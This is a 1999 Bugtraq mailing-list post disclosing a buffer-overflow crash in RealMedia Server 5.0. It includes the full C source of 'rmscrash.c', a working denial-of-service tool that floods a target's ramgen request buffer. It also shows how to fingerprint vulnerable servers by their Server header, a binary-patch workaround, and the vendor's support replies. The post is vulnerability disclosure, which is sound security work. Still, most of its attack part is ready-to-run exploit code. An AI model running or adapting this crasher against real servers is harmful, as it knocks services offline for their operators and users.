Bugtraq mailing list archives
RealMedia Server 5.0 Crasher (rmscrash.c)
From: bow () BOW NET (bow)
Date: Wed, 22 Dec 1999 22:33:21 -0800
RealMedia 5.0 servers, and probably 4.0, can be crashed by overflowing the buffer which stores the ramgen requests. I emailed RealNetworks about it and they finally got back to me a month and a half later. Their response was that it's a known issue with 5.0 and the only way to fix it is to upgrade to 6.0.. Of course upgrading means paying more money. I really wish all companies would fully back their COMMERCIAL software and make patches for previous releases. Oh well. The exploit is included below. It's been tested on FreeBSD and RealMedia server 5.0-rvserver-build-290. When the server crashes, it logs the IP of the person who crashed it in the pnserver error log. It looks like this: ***22-Dec-99 10:57:16.112 pnserver(241): TRAPPED FAULT: Attempting Crash Avoidance... ***22-Dec-99 10:57:16.112 pnserver(241): Fault caused by type 0 client from 204.216.183.2 ***22-Dec-99 10:57:16.112 pnserver(241): TRAPPED FAULT: Crash Avoidance Successful ***22-Dec-99 10:57:16.113 pnserver(241): FATAL ERROR: Couldn't Handle Fault: Terminating... ***22-Dec-99 10:57:16.113 pnserver(241): FATAL ERROR: Please File Bug Report An easy way to tell if a server is running 5.0 is to telnet to the realmedia port, usually 7070, and typing: GET /SmpDsBhgRl <enter><enter>
From what i've seen, RealMedia 5.0 servers always returns "Server: RealServer 1.0 Beta" in the
headers, and G2 (6.0, and 7.0?) servers return "Server: RMServer 1.0". A hacked up fix for the problem that I've used is to edit the pnserver binary and change the ramgen string to something else. This, however, will break the ramgen functionality. (Which i dont use). If you are going to rename the ramgen in the binary to something else, make sure it matches the string length of 6. -bow -- START OF RMSCRASH.C -- /* * rmscrash.c - bow () bow net * * Crash a RealMedia 5.0 server by sending a very long ramgen request. * * Test on: * $ pnserver -v * Version: 5.0-rvserver-build-290 * Platform: FreeBSD-2.1.x * */ #include <stdio.h> #include <stdlib.h> #include <sys/time.h> #include <sys/types.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #define BUFLEN 4082 char buf[BUFLEN+14]; int sock; struct sockaddr_in sa; struct hostent *hp; void main (int argc, char *argv[]) { int i, port; if (argc < 3) { printf("Usage: %s realserver port\n",argv[0]); exit(-1); } port = atoi(argv[2]); memset(buf,0x41,BUFLEN); memcpy(buf,"GET /ramgen/",12); memcpy(buf+BUFLEN," HTTP/1.1\r\n\r\n", 13); if ((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) { perror("gethostbyname()"); exit(0); } if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { perror("socket()"); exit(0); } sa.sin_family=AF_INET; sa.sin_port=htons(port); memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length); if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) { perror("connect()"); exit(0); } printf("Connected to %s. Sending data\n",argv[1]); write(sock,buf,strlen(buf)); printf("Done.\n"); close(sock); exit(0); } --- END OF RMSCRASH.C --- ----- Forwarded message from tsserver () support real com ----- From: tsserver () support real com Date: Wed, 22 Dec 1999 10:14:57 -0800 Subject: Re: max the ramgen buffer [#7570768] To: bow () bow net X-MIME-Autoconverted: from quoted-printable to 8bit by bow.net id KAA03016 Hello Bow, No, unfortunately there is not. The solution is to upgrade to 6.0 or 7.0. Best wishes, Kim ~~~~~~~~~~~~~~~~~~~~ Kimberly Ayars SDK Support Engineer ------- Original Message --------
From: bow () bow net To: tsserver () support real com Subject: Re: max the ramgen buffer [#7570768] Date: 12/21/99 16:58:20 Well is there a fix for this in the 5.0 server?? -bow On Tue, Dec 21, 1999 at 04:52:07PM -0800, tsserver () support real com wrote:Hello Bow, First of all, I apolgize for the delay in responding. Thank you so much for your patience. This is a known issue in the 5.0 RealServer and is fixed in the 6.0 and 7.0 RealServers. Best wishes, Kim ~~~~~~~~~~~~~~~~~~~~ Kimberly Ayars SDK Support Engineer ------- Original Message --------From: bow () bow net To: tsserver () support real com Subject: max the ramgen buffer Date: 11/06/99 04:10:46 Making a request to the Real5 server with a long (~4040 bytes) request will crash the server. Is this a known issue? ***06-Nov-99 03:48:40.248 pnserver(60580): TRAPPED FAULT: Please File Bug Report ***06-Nov-99 03:48:40.248 pnserver(60580): Fault Report: 5.0-rvserver-build-290 FreeBSD-2.1.x Do you guys have an updated Real5 server?THE INFORMATION PROVIDED IN THE REALNETWORKS KNOWLEDGE BASE IS PROVIDED 'AS IS' WITHOUT WARRANTY OF ANY KIND. REALNETWORKS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL REALNETWORKS OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF REALNETWORKS OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. Copyright c RealNetworks Inc. and/or its licensors, 1995 - 1999 all rights reserved. RealAudio, RealVideo, RealMedia and RealPlayer are trademarks of RealNetworks Inc. --------------------- Instructions to Reply --------------------- Your Incident ID number for this request is 7570768 To reply to this message you may simply reply to this email. (Please do not modify the subject line) To view all activity on this ticket go to the following URL. You will also be able to reply from there. http://customerrelations.real.com/scripts/rnforms/loginpage.asp To verify your identity, you will be prompted for this Incident ID number and your email address.
THE INFORMATION PROVIDED IN THE REALNETWORKS KNOWLEDGE BASE IS PROVIDED 'AS IS' WITHOUT WARRANTY OF ANY KIND. REALNETWORKS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL REALNETWORKS OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF REALNETWORKS OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. Copyright c RealNetworks Inc. and/or its licensors, 1995 - 1999 all rights reserved. RealAudio, RealVideo, RealMedia and RealPlayer are trademarks of RealNetworks Inc. --------------------- Instructions to Reply --------------------- Your Incident ID number for this request is 7570768 To reply to this message you may simply reply to this email. (Please do not modify the subject line) To view all activity on this ticket go to the following URL. You will also be able to reply from there. http://customerrelations.real.com/scripts/rnforms/loginpage.asp To verify your identity, you will be prompted for this Incident ID number and your email address. ----- End forwarded message -----
Current thread:
- Microsoft Security Bulletin (MS99-061), (continued)
- Microsoft Security Bulletin (MS99-061) Aleph One (Dec 21)
- More Netscape Passwords Available. Rob Jones (Dec 21)
- UnixWare i2odialogd remote root exploit Brock Tellier (Dec 21)
- IE 5.01 vulnerabilities in external.NavigateAndFind() Georgi Guninski (Dec 22)
- Solaris 2.7 dmispd local/remote problems Brock Tellier (Dec 22)
- Multiple vulnerabilites in glFtpD (current versions) suid (Dec 22)
- Re: Multiple vulnerabilites in glFtpD (current versions) Per Lejontand (Dec 23)
- Re: Multiple vulnerabilites in glFtpD (current versions) The Tree of Life (Dec 23)
- Re-release of Microsoft Security Bulletin MS99-046 Microsoft Product Security (Dec 23)
- BUG? Non-root user can configure traffic shaper (2.2.13) (fwd) Yuri Kuzmenko (Dec 24)
- RealMedia Server 5.0 Crasher (rmscrash.c) bow (Dec 22)
- Re: procmail / Sendmail - five bugs Casper Dik (Dec 23)
- Re: SSH-1.2.27 & RSAREF2 exploit Wakko Ellington Warner-Warner III (Dec 15)
- Recent postings about SCO UnixWare 7 Andrew Malcolm (Dec 15)
- Re: SSH-1.2.27 & RSAREF2 exploit Iván Arce (Dec 15)
- Oops, my apologies. Wakko Ellington Warner-Warner III (Dec 15)
- IRCnet IRCD 2.0x Reboot Bug A Bloke (Dec 15)
- Re: IRCnet IRCD 2.0x Reboot Bug Matus \ (Dec 15)
- Re: SSH-1.2.27 & RSAREF2 exploit Speed (Dec 15)